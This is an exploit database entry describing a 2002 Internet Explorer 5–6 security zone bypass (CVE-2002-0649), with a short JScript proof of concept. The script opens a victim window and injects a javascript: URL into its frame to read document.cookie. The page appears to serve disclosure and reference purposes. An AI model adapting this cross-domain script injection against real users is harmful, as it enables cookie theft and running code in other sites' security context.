header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
SecurityFocus
7,5
CVSS
HIGH
Security Zone Bypass
264
CWE
Product Name: Internet Explorer
Affected Version From: MSIE 5.0
Affected Version To: MSIE 6.0
Patch Exists: YES
Related CWE: CVE-2002-0649
CPE: a:microsoft:internet_explorer
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002

MSIE Security Zone Bypass Vulnerability

When a Microsoft Internet Explorer (MSIE) window opens another window, security checks should prevent the parent from accessing the child if the latter is of another domain or Security Zone. It has been reported that such checks fails to occur against attempts to access the frames of child window documents. It is possible for a parent window to set the URL of frames or iframes within a child window regardless of the domain or Security Zone. This has serious security implications as the parent can cause script code to be executed within the context of the child domain by setting the URL to the 'javascript' protocol, followed by the desired code. Attackers may also execute script code within the 'My Computer' Zone. This may have more severe consequences.

Mitigation:

Ensure that all security checks are performed when opening a new window.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5672/info

When a Microsoft Internet Explorer (MSIE) window opens another window, security checks should prevent the parent from accessing the child if the latter is of another domain or Security Zone. It has been reported that such checks fails to occur against attempts to access the frames of child window documents. It is possible for a parent window to set the URL of frames or iframes within a child window regardless of the domain or Security Zone. This has serious security implications as the parent can cause script code to be executed within the context of the child domain by setting the URL to the "javascript" protocol, followed by the desired code. Attackers may also execute script code within the "My Computer" Zone. This may have more severe consequences. 

<script language="jscript">
onload=function () {
    var
oVictim=open("http://groups.google.com/groups?threadm=anews.Aunc.850","OurVi
ctim","width=100,height=100");
    setTimeout(
        function () {
            oVictim.frames[0].location.href="javascript:alert(document.cooki
e)";
        },
        7000
    );
}
</script>

Navigation

Suggest Exploit

Services By CQR